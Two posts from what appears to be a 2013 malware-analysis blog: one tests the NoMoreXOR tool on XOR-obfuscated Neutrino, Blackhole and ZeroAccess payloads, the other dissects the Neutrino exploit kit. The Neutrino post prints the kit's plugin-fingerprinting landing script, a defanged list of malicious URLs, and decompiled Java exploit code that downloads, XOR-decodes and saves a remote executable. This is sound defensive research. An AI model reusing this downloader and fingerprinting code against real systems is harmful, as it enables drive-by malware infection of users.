Thursday, May 30, 2013

A peak at NoMoreXOR

I have, since I heard about it in April, wanted to take a closer look at NoMoreXOR a Python tool made by Glenn over @Hiddenillusion 

When dealing with exploit kits we have a need to deobfuscate the final payload that these "Mass customized attacks" (see this video on the topic -> I liked) are throwing our way. Since I do not do Sudoku I very much like the pussle of going through some obfuscated Java code to figure out how to deobfuscate the payloads, but sometimes when we need a quick answer to what really hit us,  a tool would be great.

Hopefully NoMoreXor can help us to achieve that.

When I stumbled over a Blackhole EK here the other day I thought it would be a good opportunity to test NoMoreXOR on the payloads. So I fetched 4 JAR files and the obfuscated binary to be sure we had something to work with. For info on how to download exploits and payloads from BHEK see my "Analyzing Blackhole EK" post. My last post was about Neutrino  . We had a xored payload from there as well which we can play with. And finally we will have a look at Zeroaccess  getL messages(small hope for help on those, but we will see).

1. NoMoreXOR vs Neutrino binary payloads

Lets look at the file we want to deobfuscate:

0000000: 3c31 c3a9 7572 6b79 7575 6b79 75c2 8ec2  <1..urkyuukyu...
0000010: 9479 75c3 896b 7975 716b 7975 316b 7975  .yu..kyuqkyu1kyu
0000020: 716b 7975 716b 7975 716b 7975 716b 7975  qkyuqkyuqkyuqkyu
0000030: 716b 7975 716b 7975 716b 7975 716b 7975  qkyuqkyuqkyuqkyu
0000040: c2a1 6b79 757f 74c3 837b 71c3 9f70 c2b8  ..kyu.t..{q..p..
0000050: 50c3 9378 39c2 bc4a 2d1d 1818 5905 0304  P..x9..J-...Y...
0000060: 1e07 1006 5916 1005 171a 054b 1b10 5119  ....Y......K..Q.
0000070: 0c1b 5102 1755 3524 2a55 1c04 1d10 5f66  ..Q..U5$*U...._f
0000080: 747f 556b 7975 716b 7975 320b c3a8 c39a  t.Ukyuqkyu2.....
0000090: 766a c286 c289 766a c286 c289 766a c286  vj....vj....vj..
00000a0: c289 51c2 acc3 bbc2 8977 6ac2 86c2 8976  ..Q......wj....v
00000b0: 6ac2 87c2 891c 6ac2 86c2 8951 c2ac c3bd  j.....j....Q....
00000c0: c289 796a c286 c289 51c2 acc3 bcc2 8977  ..yj....Q......w
00000d0: 6ac2 86c2 8951 c2ac c3ab c289 606a c286  j....Q......`j..
00000e0: c289 51c2 acc3 bac2 8977 6ac2 86c2 8951  ..Q......wj....Q
00000f0: c2ac c3be c289 776a c286 c289 2302 1a1d  ......wj....#...
0000100: 766a c286 c289 212e 7975 3d6a 7a75 065f  vj....!.yu=jzu._
0000110: c297 3571 6b79 7571 6b79 75c2 916b 7a74  ..5qkyuqkyu..kzt
0000120: 7a6a 7175 71c3 8f79 7571 c393 7b75 716b  zjquq..yuq..{uqk
0000130: 7975 5b49 7975 717b 7975 71c2 ab79 7571  yu[Iyuq{yuq..yuq
0000140: 6b39 7571 7b79 7571 6979 7575 6b79 7571  k9uq{yuqiyuukyuq
0000150: 6b79 7575 6b79 7571 6b79 7571 c3ab 7a75  kyuukyuqkyuq..zu
0000160: 716f 7975 3523 7a75 736b 7975 716b 6975  qoyu5#zuskyuqkiu
0000170: 717b 7975 716b 6975 717b 7975 716b 7975  q{yuqkiuq{yuqkyu
0000180: 616b 7975 716b 7975 716b 7975 1dc3 8779  akyuqkyuqkyu...y
0000190: 75c3 bd6b 7975 711b 7a75 7963 7975 716b  u..kyuq.zuycyuqk
00001a0: 7975 716b 7975 716b 7975 716b 7975 716b  yuqkyuqkyuqkyuqk


We can see patterns and repetitive chars here. Definately a candidate for XOR. And since we know it to come from an exploit kit we expect win binaries, so it is obuscated.

Lets run NoMoreXOR:

remnux@remnux:~/EK/xor/neutrino$ NoMoreXOR.py -a -o out.hex neutrino.bin
[+] Attempting auto analysis
[+] HEXing................................: neutrino.bin
[+] Saving as.............................: out.hex
[+] Attempting to guess the XOR key of....: out.hex
[+] Size of content.......................: 379904
[+] Total pages (1024k)...................: 371
[+] Total contiguous 512 chunks...........: 742
[+] Top (5) overall chars
=============================================
 Occurences | Character(s)
---------------------------------------------
      13797 = 0x75
      13619 = 0x79
      13488 = 0x6b
      13332 = 0x71
       1479 = 0x86

[+] Total number of unique 512 chunks.....: 642
[+] Top (5) 512 char sequences after cleanup
=============================================
 Occurences | Character(s)
---------------------------------------------
 101 = 716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975

 1 = 6e662191ae967f7997adda6f52d7e87c32615ae3afb5d8e378dd4ee885db350032415823d25ce457717afb2c716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975716b7975

Being no expert on the tool: I think it is telling us that the key is about 4 byte and that the values are 0x75, 0x79, 0x6b and 0x71 (ascii: u, y, k q). Look in the Neutrino post and you will see that thats correct :) At least those are overrepresented in the file. The tool gives us 5 candidates for keys and 5 candidates for files that should be deobfuscated. We have to go hrough them and figure out which one we think fits best.

Lets have a look at candidate 0:

0000000: 4d5a c290 0003 0000 0004 0000 00c3 bfc3  MZ..............
0000010: bf00 00c2 b800 0000 0000 0000 4000 0000  ............@...
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: c390 0000 000e 1fc2 ba0e 00c2 b409 c38d  ................
0000050: 21c2 b801 4cc3 8d21 5468 6973 2070 726f  !...L..!This pro
0000060: 6772 616d 2063 616e 6e6f 7420 6265 2072  gram cannot be r
0000070: 756e 2069 6e20 444f 5320 6d6f 6465 2e0d  un in DOS mode..
0000080: 0d0a 2400 0000 0000 0000 4360 c291 c2af  ..$.......C`....
0000090: 0701 c3bf c3bc 0701 c3bf c3bc 0701 c3bf  ................
00000a0: c3bc 20c3 87c2 82c3 bc06 01c3 bfc3 bc07  .. .............
00000b0: 01c3 bec3 bc6d 01c3 bfc3 bc20 c387 c284  .....m..... ....
00000c0: c3bc 0801 c3bf c3bc 20c3 87c2 85c3 bc06  ........ .......
00000d0: 01c3 bfc3 bc20 c387 c292 c3bc 1101 c3bf  ..... ..........
00000e0: c3bc 20c3 87c2 83c3 bc06 01c3 bfc3 bc20  .. ............ 
00000f0: c387 c287 c3bc 0601 c3bf c3bc 5269 6368  ............Rich
0000100: 0701 c3bf c3bc 5045 0000 4c01 0300 7734  ......PE..L...w4
0000110: c3ae 4000 0000 0000 0000 00c3 a000 0301  ..@.............


Hey that looks to be pretty close.  The other candidates did not look like win exe files so we stop at the first one. Luckily I made a python tool to deobfuscate the neutrino binary received. So lets do a diff on the files and check:

remnux@remnux:~/EK/xor/neutrino$ diff -s neutrino.exe neutrino.bin.0.unxored 
Files neutrino.exe and neutrino.bin.0.unxored are identical

Yes they match exactly :) Nice NoMoreXOR!

2. NoMoreXOR vs Blackhole binary payloads

Lets look at the payload received from the blackhole EK:

0000000: 2f1e 3618 c289 7c6e 50c2 b614 c3b6 c3a8  /.6...|nP.......
0000010: 2533 3ec2 a0c2 bac3 a4c3 8638 c2aa 1cc2  %3>........8....
0000020: 8e70 12c2 b416 c288 7a6c 5e40 c2a2 04c3  .p......zl^@....
0000030: a6c3 98c3 8a3c c2ae 10c3 b2c3 9436 c2a8  .....<.......6..
0000040: 1ac2 8c7e 6042 c2a4 06c3 b8c3 aac3 9cc3  ...~`B..........
0000050: 8e30 c292 7456 483a 2cc2 9e00 c3ac c39b  .0..tVH:,.......
0000060: c29c c296 0a48 c3a7 1d13 2c77 24c2 976d  .....H....,w$..m
0000070: c3aa 48c3 ab17 66c3 8858 c3b3 69c2 82c2  ..H...f..X..i...
0000080: b359 c2b6 6bc2 9bc2 82c2 b0c2 af56 c2a4  .Y..k........V..
0000090: 043d 6ac3 8e5b c3be 523d c398 08c3 9e43  .=j..[..R=.....C
00000a0: c2ad c380 c2af 4bc3 a21d 4451 43c2 ba36  ......K...DQC..6
00000b0: c3b4 c396 c388 3ac2 ac1e c280 3201 c2a6  ......:.....2...
00000c0: 18c3 867d 6850 3256 52c2 b9c3 9ac3 8c3e  ...}hP2VR......>
00000d0: c2a0 02c3 a4c3 8638 4a1c c281 7159 c2b5  .......8J...qY..
00000e0: 14c2 ba7a 1a5e 40c2 a2c3 8cc3 a7c3 98c3  ...z.^@.........
00000f0: 8a3c c2ae 1002 c28d 36c2 a81a c29c 7e60  .<......6.....~`
0000100: 4204 06c3 b8c3 aac3 9cc2 8e30 c292 6456  B..........0..dV
0000110: 48c2 ba2e c29e 00c3 a6c3 8426 c298 0ac3  H..........&....
0000120: bcc3 aec3 9036 c294 7668 5a4c c2be 20c2  .....6..vhZL.. .
0000130: 82c3 a444 c2b8 2ac2 980e c3b0 76c2 aec2  ...D..*.....v...
0000140: 9408 c3b8 c3ac c39e c380 22c2 8476 584a  .........."..vXJ
0000150: c2ac 2ec2 9072 54c2 a628 c29a 1cc3 bec3  .....rT..(......
0000160: a0c3 8224 c286 787a 5c4e c2b0 12c3 b4c3  ...$..xz\N......
0000170: 96c3 883a c2ac 1ec2 80c3 aec3 b1c2 a718  ...:............
0000180: c2b6 7c6e 50c2 b2c3 94c3 b7c3 a876 763e  ..|nP........vv>
0000190: c2a0 02c3 a4c3 8638 c2aa 1cc2 8e70 52c3  .......8.....pR.
00001a0: b614 c288 c282 715e 40c2 a204 c3a6 c398  ......q^@.......
00001b0: c38a 3cc2 ae10 c3b2 c394 36c2 a81a c28c  ..<.......6.....
00001c0: 7e60 42c2 a406 c3b8 c3aa c39c c38e 30c2  ~`B...........0.
00001d0: 9274 5648 c2ba 2cc2 9e00 c3a2 c384 26c2  .tVH..,.......&.
00001e0: 980a c3bc c3ae c390 32c2 9476 685a 4cc2  ........2..vhZL.

Not so easy to determine. Could it be encrypted? Again a payload binary from an exploit kit so we expect a win exe. Lets run NoMoreXOR


remnux@remnux:~/EK/xor/blackhole$ NoMoreXOR.py -a -o out.hex a.bin
[+] Attempting auto analysis
[+] HEXing................................: a.bin
[+] Saving as.............................: out.hex
[+] Attempting to guess the XOR key of....: out.hex
[+] Size of content.......................: 311280
[+] Total pages (1024k)...................: 303
[+] Total contiguous 512 chunks...........: 607
[+] Top (5) overall chars
=============================================
 Occurences | Character(s)
---------------------------------------------
        943 = 0x56
        939 = 0x8a
        935 = 0x1a
        934 = 0x3a
        931 = 0x6a

[+] Total number of unique 512 chunks.....: 467
[+] Top (5) 512 char sequences after cleanup
=============================================
 Occurences | Character(s)
---------------------------------------------
 134 = f2d436881aecfec0228466784a5cae30927456a83a8c1ee0c2248618eafcced0329476485aac3e806244a6388a1ceef0d23496687a4c5ea002e4c6d82abc0e907254b6089a6c7e40a204e6f8cadc2eb012f4d628ba0c9e6042a406986a7c4e50b214f6c8da2cbe00e2c426b80a9c6e7052b416e8faccde2082644658aa3c8e10f2d436881aecfec0228466784a5cae30927456a83a8c1ee0c2248618eafcced0329476485aac3e806244a6388a1ceef0d23496687a4c5ea002e4c6d82abc0e907254b6089a6c7e40a204e6f8cadc2eb012f4d628ba0c9e6042a406986a7c4e50b214f6c8da2cbe00e2c426b80a9c6e7052b416e8faccde2082644658aa3c8e10

 6 = 6244a6188a7c6e50b214f6e8dacc3ea002e4c638aa1c8e7052b416887a6c5e40a204e6d8ca3cae10f2d436a81a8c7e6042a406f8eadcce3092745648ba2c9e00e2c426980afceed0329476685a4cbe20826446b82a9c0ef0d2349608faecdec0228466584abc2e907254b6289a0cfee0c22486786a5c4eb012f4d6c83aac1e806244a6188a7c6e50b214f6e8dacc3ea002e4c638aa1c8e7052b416887a6c5e40a204e6d8ca3cae10f2d436a81a8c7e6042a406f8eadcce3092745648ba2c9e00e2c426980afceed0329476685a4cbe20826446b82a9c0ef0d2349608faecdec0228466584abc2e907254b6289a0cfee0c22486786a5c4eb012f4d6c83aac1e80


Nothing to conclude from this output? Seems like there is one key though...

Again 5 files to look more into.

File 0:

0000000: c39d c38a 00c2 90c2 93c2 90c2 90c2 90c2  ................
0000010: 94c2 90c2 90c2 906f 6fc2 90c2 9028 c290  .......oo....(..
0000020: c290 c290 c290 c290 c290 c290 c390 c290  ................
0000030: c290 c290 c290 c290 c290 c290 c290 c290  ................
0000040: c290 c290 c290 c290 c290 c290 c290 c290  ................
0000050: c290 c290 c290 c290 c290 c290 c290 c290  ................
0000060: c290 c290 c290 c290 c290 c290 c290 c290  ................
0000070: c290 c290 10c2 90c2 90c2 90c2 9ec2 8f2a  ...............*
0000080: c29e c290 24c2 995d c2b1 28c2 91c3 9c5d  ....$..]..(....]
0000090: c2b1 c384 c3b8 c3b9 c3a3 c2b0 c3a0 c3a2  ................
00000a0: c3bf c3b7 c3a2 c3b1 c3bd c2b0 c3b3 c3b1  ................
00000b0: c3be c3be c3bf c3a4 c2b0 c3b2 c3b5 c2b0  ................
00000c0: c3a2 c3a5 c3be c2b0 c3b9 c3be c2b0 c394  ................
00000d0: c39f c383 c2b0 c3bd c3bf c3b4 c3b5 c2be  ................
00000e0: c29d c29d c29a c2b4 c290 c290 c290 c290  ................
00000f0: c290 c290 c290 c380 c395 c290 c290 c39c  ................
0000100: c291 c296 c290 10c3 9234 c381 c290 c290  .........4......
0000110: c290 c290 c290 c290 c290 c290 70c2 90c2  ............p...



Not what we where looking for, continue

File 1:

0000000: 4d5a c290 0003 0000 0004 0000 00c3 bfc3  MZ..............
0000010: bf00 00c2 b800 0000 0000 0000 4000 0000  ............@...
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: c280 0000 000e 1fc2 ba0e 00c2 b409 c38d  ................
0000050: 21c2 b801 4cc3 8d21 5468 6973 2070 726f  !...L..!This pro
0000060: 6772 616d 2063 616e 6e6f 7420 6265 2072  gram cannot be r
0000070: 756e 2069 6e20 444f 5320 6d6f 6465 2e0d  un in DOS mode..
0000080: 0d0a 2400 0000 0000 0000 5045 0000 4c01  ..$.......PE..L.
0000090: 0600 c280 42c2 a451 0000 0000 0000 0000  ....B..Q........
00000a0: c3a0 000f 010b 0102 3200 7600 0000 c388  ........2.v.....
00000b0: 0100 0000 0000 c3b0 5900 0000 1000 0000  ........Y.......
00000c0: c2a0 0000 0000 4000 0010 0000 0002 0000  ......@.........
00000d0: 0400 0000 0000 0000 0400 0000 0000 0000  ................
00000e0: 00c2 8002 0000 0400 00c2 a4c2 9a02 0002  ................
00000f0: 0000 0000 0010 0000 1000 0000 0010 0000  ................
0000100: 1000 0000 0000 0010 0000 0000 0000 0000  ................
0000110: 0000 00c2 8cc2 b501 003c 0000 0000 c380  .........<......
0000120: 0100 c2ac c2ba 0000 0000 0000 0000 0000  ................
0000130: 0042 0200 c3b8 1d00 0000 0000 0000 0000  .B..............
0000140: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000160: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000170: 00c3 a8c2 b501 0020 0000 0000 0000 0000  ....... ........
0000180: 0000 0000 0000 0000 0000 0000 0000 0000  ................



Nice, thats more like it.

Now lets test it -> I ran it; and what else to expect than Ransomeware.

2-0 to NoMoreXOR - Great!

3. NoMoreXOR vs Zeroaccess getL messages

Lastly lets have a brief look at ZeroAccess P2P traffic that we know to be XORed.
Original traffic:


0000000: c2b8 3f35 c3be 28c2 94c2 8dc2 abc3 89c3  ..?5..(.........
0000010: 80c3 91c2 99c2 85c2 956f 3f0a            .........o?.


Output from NoMoreXOR:

remnux@remnux:~/EK/xor/zeroaccess$ NoMoreXOR.py -a -o out.hex getl2
[+] Attempting auto analysis
[+] HEXing................................: getl2
[+] Saving as.............................: out.hex
[+] Attempting to guess the XOR key of....: out.hex
[+] Size of content.......................: 56
[+] Total pages (1024k)...................: 0
[+] Total contiguous 512 chunks...........: 0
[+] Top (5) overall chars
=============================================
 Occurences | Character(s)
---------------------------------------------
          7 = 0xc2
          4 = 0xc3
          2 = 0x3f
          1 = 0xbe
          1 = 0xab

[+] Total number of unique 512 chunks.....: 1
[+] Top (5) 512 char sequences after cleanup
=============================================
 Occurences | Character(s)
---------------------------------------------
 1 = c2b83f35c3be28c294c28dc2abc389c380c391c299c285c2956f3f0a

[+] Trying XOR key : c2b83f35c3be28c294c28dc2abc389c380c391c299c285c2956f3f0a
[+] XOR'ing................................: getl2
[+] Saving as..............................: getl2.0.unxored
[+] Scanning with Yara
[-] Using rules............................: /usr/local/etc/capabilities.yara


Only one candidate this time:

0000000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000010: 0000 0000 0000 0000 0000 0000 0a         .............

No luck this time.  I guess the tool was not made for it either.

4. Conclusion

Seems like we have found a really useful tool here. Thanks to @Hiddenillusion for sharing. As this  tool is totally open source we are able to extend the tool should we want to do that.



Happy XORing Exploit Kit payloads



For description and how to use see the link to Hiddenillusions above.

Further reading:
Malwarebites on XOR - By Joshua Cannell
SANS DFIR - By Lenny Zeltser

Friday, May 10, 2013

Neutrino Exploit Kit analysis


I have previously looked at the neutrino landing page: Neutrino landing page demystified and Neutrino landing pane change.
There obviously are quite a few Neutrino live kits out there so it is time to take a closer look at this evil piece of software. Lets see if we can figure out what these bad actors are up to and make sure that we can detect activity related to the Neutrino exploit kit.



1. Gate


Neutrino has a gate which you will have to pass to be able to get to the landing pane. To get to the gate you normally follow a series of hacked sites which will redirect. The gate will give you html to move you over to the landing pane to look at your client and find a way to exploit you. If you have the url to the gate and a valid referer you will be able to get valid urls to the landing:

--2013-05-07 --  hxxp:// www.leritsuwa.biz/cust_gw/ads_m/show_bn.c.php?sid=27982987

Resolving www.leritsuwa.biz... 77.81.183.98

Connecting to www.leritsuwa.biz|77.81.183.98|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 402 [text/html]

Saving to: `c2_1.php'



     0K                                                       100% 24.7M=0s



2013-05-07 (24.7 MB/s) - `c2_1.php' saved [402/402]



<HTML><HEAD><title>Canadian Pharmacies Buy Generic Drugs Prescription International Online Pharmacy Drugstore</title><meta http-equiv="refresh" content="20;url=hxxp:// www.expressmedscanada.com/?id=
15&group=158"></HEAD><FRAMESET rows="100%" BORDER=0 FRAMEBORDER=0 FRAMESPACING=0><FRAME NAME="fi20o3893jhms" SRC="hxxp:// milk-cocoa.info/lghvewgr?foyuhtmbcj=3800964"><noframes></noframes></FRAMESET
></HTML>


You will over time get new urls to the landing pane:

hxxp: //milk-cocoa.info/lskbiqp?frglxucscol=3800964

hxxp: //milk-cocoa.info/lhdlqxyl?fbljocmikem=3800964

hxxp: //milk-cocoa.info/lsbqfqw?frovckttsq=3800964

hxxp: //milk-cocoa.info/liwmlvf?fehbyxmtxg=3800964

hxxp: //milk-cocoa.info/ltkirxwniohper?fgcycebw=3800964

hxxp: //freshaircleaner.org/lkyjngdxnteuq?fmcmkkkrl=3800964

hxxp: //borlanove.net/lxfyvqlynuq?fofgfj=3800964

hxxp: //ufohuntersde.com/lwjreshxkq?fwvpxubwtskl=3800964

hxxp: //ufohuntersde.org/luimkvtrqdjcp?fdekcxhep=3800964

hxxp: //ufohuntersde.org/lupofx?fowxcseexqhx=3800964

hxxp: //ufohuntersde.org/lupofx?fowxcseexqhx=3800964

hxxp: //ufohuntersde.info/lxinmt?fdsrfeodpqr=3800964

hxxp: //ufohuntersde.info/lcgdqbnvox?futqfwvjjm=3800964

hxxp: //ufohuntersde.info/lhpixuskkvx?fgtujfccrw=3800964

hxxp: //ufohuntersde.info/lumqnhjb?fjoywbpcihk=3800964

hxxp: //morabudac.com/ldqumpgiqlrgh?flobicxfnq=3800964


I have however noticed that the 7 digit number for the f{random length lowercase random string} parameter stays the same over time. The urls to the landing will also be reused.

2. Landing pane


<!DOCTYPE HTML>
<html>
<head>
 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> 
 <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
 <script type="text/javascript">
  $(document).ready(function() {
   АН602(
    '51895b4daaa2ccbb52175bd0', 
    'wvwyk', 
    'ckjktkjbjz',
    'pmoqfbqjzr',
    'ifhebqbx'    
   );
  });

  function АН602(hid, pass, cph, xpn, ipn) {
   var info = {
    hid : hid,
    plugins : {
     adobe_reader: PluginDetect.getVersion('AdobeReader'),
     java: PluginDetect.getVersion('Java'),
     flash: PluginDetect.getVersion('Flash'),
     quick_time: PluginDetect.getVersion('QuickTime'),
     real_player: PluginDetect.getVersion('RealPlayer'),
     shockwave: PluginDetect.getVersion('Shockwave'),
     silver_light: PluginDetect.getVersion('Silverlight'),
     vlc: PluginDetect.getVersion('VLC'),
     wmp: PluginDetect.getVersion('WMP')
    }
   };

   var obj = {};
   obj[xpn] = pass;
   obj[ipn] = encodeURIComponent(xor(JSON.stringify(info), pass));
   
   $.post(cph, obj, function(data, status){
    $("body").append(xor(decodeURIComponent(data), pass));
   });
   
  }

  function xor(input, pass) {
   var output = "";
   var i = 0;
   var pos = 0;
   for (i = 0; i < input.length; i++){ 
     pos = Math.floor(i%pass.length);
     output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos));
   }
   return output;
  }

  JSON.stringify = JSON.stringify || function (obj) {
   var t = typeof (obj);
   if (t != "object" || obj === null) {
    // simple data type
    if (t == "string") obj = '"'+obj+'"';
    return String(obj);
   }
   else {
    // recurse array or object
    var n, v, json = [], arr = (obj && obj.constructor == Array);
    for (n in obj) {
     v = obj[n]; t = typeof(v);
     if (t == "string") v = '"'+v+'"';
     else if (t == "object" && v !== null) v = JSON.stringify(v);
     json.push((arr ? "" : '"' + n + '":') + String(v));
    }
    return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}");
   }
  };
 </script> 
</head>
<body>
</body>
</html>




This we do recognize from the post Neutrino landing pane change or variation. The jquery and plugin_detector stuff is documented in the Neutrino landing page demystified.


3. Start the more evil stuff

The landing pane will report whats installed on your computer and will fetch javascript code to fetch exploits.




the HTTP POST request is covered in earlier posts

What do we get back:


K%05%14%0B%02%07%02W%15%0A%19%11%02%18%0C%12KP3%0A%01%17%04%1A%19%1E%06%03%5EU%7D%7F~pb~%1F%11YCP%3B%1E%1A%19%18%05%18%1F%1FW%3F%19%0D%0E%05%18%12%0DK2%0E%07%15%04%05%13%05%5EKJKW%17%0A%01%1F%10%18%1F%18%04Y%18%1B%078%16%14%0E%5EV%0Csb~%7F~pb%13%19%14%0C%06%12%18%03W%1C%05%1F%03%1CCPJ%16%09%1B%1B%13%03Y%04%15%1C%12%1A%1FJT6%1B%08Y%12%16%0DIW%17%05%1A%03%1E%12DI%1F%02%03%09QXY%1A%10%07%1C%5B%14%16%08%18%17Y%1A%04%1AY%12%08%13%05%1E%05%1E%06%1F%07%1B%09T%1F%1A%0D%0F%08%07%17JLZOOB%1B_%13%17%16%18Y%14%15%15%1B%5EEG%40L%09%13FUY%1C%1E%12%03%11VUGG%5BK%1F%13%1E%1E%03%03KUH%5BUHK%09%0A%05%17%1AY%05%16%1B%12DI%12%0E%12%1AIW%16%15%1E%12KU%18%23%25F%14%3D%04%01%3AEH%1B%151%04%0D2EO%1D%1BY2%03.KR%03%3AD%3B%03%14%3E9%03%0E%200%0E%23%3C%07%07%15K%21%1F%26E%11%5B%16%21%25%11%0F%20%02%0F%29%3F%22%0E8%3DF%2F%1D%2B.%211%11%26%1A8%1D%20%06%3EG%3A%13.D8%203%3A7JDIIJ%07%18%19%16%1BW%17%0A%1A%13J%5B%13%1C%13%0E%5BK%01%17%1B%0C%0EJT%06%12%12%02TIED%16%06%07%15%0E%03HPPP%7D%7F~pb~%0BW%1C%07%04%13W%02a~%7F~pb~%12%18%1A%1E%1A%13%19%0DE%04%1E%0D%0E_QK%1C%06%15%13%13Y%04%15%1C%12%1A%1FJT6%1B%08Y%12%16%0DIW%02%0E%09%0EJT%16%09%1B%1B%1F%14%18%1F%1E%19%19V%13Z%1C%16%0F%0AZ%17%07%09%07%12%02L%0F%0E%05%05%1E%16%05JGYOIW%17%05%1A%03%1E%12DI%1F%02%03%09QXY%1A%10%07%1C%5B%14%16%08%18%17Y%1A%04%1AY%12%08%13%05%1E%05%1E%06%1F%07%1B%09T%1F%1A%0D%0F%08%07%17JLZOOB%1B_%13%17%16%18Y%14%15%15%1B%5EEG%40L%09%13FUY%1C%1E%12%03%11VUGG%5BK%1F%13%1E%1E%03%03KUH%5BUV%12%01%0E%14KU%18%23%25F%14%3D%04%01%3AEH%1B%151%04%0D2EO%1D%1BY2%03.KR%03%3AD%3B%03%14%3E9%03%0E%200%0E%23%3C%07%07%15K%21%1F%26E%11%5B%16%21%25%11%0F%20%02%0F%29%3F%22%0E8%3DF%2F%1D%2B.%211%11%26%1A8%1D%20%06%3EG%3A%13.D8%203%3A7JDIW%0E%1C%1C%12JT%06%12%12%02TIED%12%1B%15%1C%0FIQ%5EBa~%7F~pb%0A%7C~pb~JX%0A%08%05%1F%07%0DU%7D%7F~


We need to URLDecode the answer and xor it to be able to understand what the bad guys are throwing at us. We have the XOR key from the landing.



<script language='Javascript'>

if ('Microsoft Internet Explorer' == navigator.appName) {
document.write('<applet object="Abc.dat" archive="hxxp:// milk-cocoa.com/eqxrhrgmhqlp?hlzvcpa=51895b4
daaa2ccbb52175bd0" width="10" height="10"><param name="exec" value="aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRhdWtxPTUxODk1YjRkYWFhMmNj
YmI1MjE3NWJkMA=="><param name="xkey" value="qkyu"></applet>');
} else {
document.write('<embed object="Abc.dat" type="application/x-java-applet;version=1.6" archive="hxxp:/
/ milk-cocoa.com/eqxrhrgmhqlp?hlzvcpa=51895b4daaa2ccbb52175bd0" width="10" height="10" exec="aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRh
dWtxPTUxODk1YjRkYWFhMmNjYmI1MjE3NWJkMA==" xkey="qkyu"></embed>');


As expected they want us to run some Java code.

4.  URL to the final payload


In the applet tag the "exec" variable has the value for the URL to the final payload/malware payload. This is base64encoded so we need to decode it:



hxxp:// milk-cocoa.com/papssyarejjoba?htidaukq=51895b4daaa2ccbb52175bd0


5. Malware


Start of the malware file:





This is, also as expected, obfuscated and  we need to go into the Java code to figure it out.

6. Java code cve


The Java Code is exploiting CVE-2013-0431 as described by Rapid7 here





7. Java code deobfuscation


First the payload url decodeing: get the parameter value of exec and base64 decode:


String str1 = getParameter("exec");
      if ((str1 == null) || (str1.length() == 0))
        System.exit(0);
      Object localObject3;
      if (!str1.startsWith("http"))
        try
        {
          BASE64Decoder localBASE64Decoder = new BASE64Decoder();
          localObject3 = localBASE64Decoder.decodeBuffer(str1);
          str1 = new String(localObject3, "UTF-8");


String:

aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRhdWtxPTUxODk1YjRkYWFhMmNjYmI1MjE3NWJkMA==

Decoded: hxxp:// milk-cocoa.com/papssyarejjoba?htidaukq=51895b4daaa2ccbb52175bd0

Where is the file saved:


File localFile = File.createTempFile("~tmp", ".exe");
          FileOutputStream localFileOutputStream = new FileOutputStream(localFile);

Get the xor key and deobfuscate the downloaded file:


String str3 = getParameter("xkey");
          if ((str3 != null) && (str3.length() != 0))
          {
            byte[] arrayOfByte3 = new byte[arrayOfByte2.length];
            arrayOfByte3 = xwk(arrayOfByte2, str3.getBytes("ISO_8859_1"));
            localFileOutputStream.write(arrayOfByte3);
          }

public byte[] xwk(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2)
  {
    byte[] arrayOfByte = new byte[paramArrayOfByte1.length];
    for (int i = 0; i < paramArrayOfByte1.length; i++)
      arrayOfByte[i] = (byte)(paramArrayOfByte1[i] ^ paramArrayOfByte2[(i % paramArrayOfByte2.length)]);
    return arrayOfByte;
  }



Iterate the file downloaded, XOR with the key byte for byte and start over when reaching the end.

Python is perfect for this:


#@malforsec py script to decode Neutrino bin files
def main():
  exefile = ''
  key = 'qkyu'
  with open('neutrino.bin', 'r') as f1:
    inf = f1.read()
    for i in range (0, len(inf),1):
      exefile += chr(ord(inf[i]) ^ ord(key[i % len(key)]))
  with open('neutrino.exe', 'w') as outf:
    outf.write(exefile)

if __name__ == "__main__":
    main() 


Did we get it right:

0000000: 4d5a c290 0003 0000 0004 0000 00c3 bfc3  MZ..............
0000010: bf00 00c2 b800 0000 0000 0000 4000 0000  ............@...
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: c390 0000 000e 1fc2 ba0e 00c2 b409 c38d  ................
0000050: 21c2 b801 4cc3 8d21 5468 6973 2070 726f  !...L..!This pro
0000060: 6772 616d 2063 616e 6e6f 7420 6265 2072  gram cannot be r
0000070: 756e 2069 6e20 444f 5320 6d6f 6465 2e0d  un in DOS mode..
0000080: 0d0a 2400 0000 0000 0000 4360 c291 c2af  ..$.......C`....
0000090: 0701 c3bf c3bc 0701 c3bf c3bc 0701 c3bf  ................
00000a0: c3bc 20c3 87c2 82c3 bc06 01c3 bfc3 bc07  .. .............
00000b0: 01c3 bec3 bc6d 01c3 bfc3 bc20 c387 c284  .....m..... ....
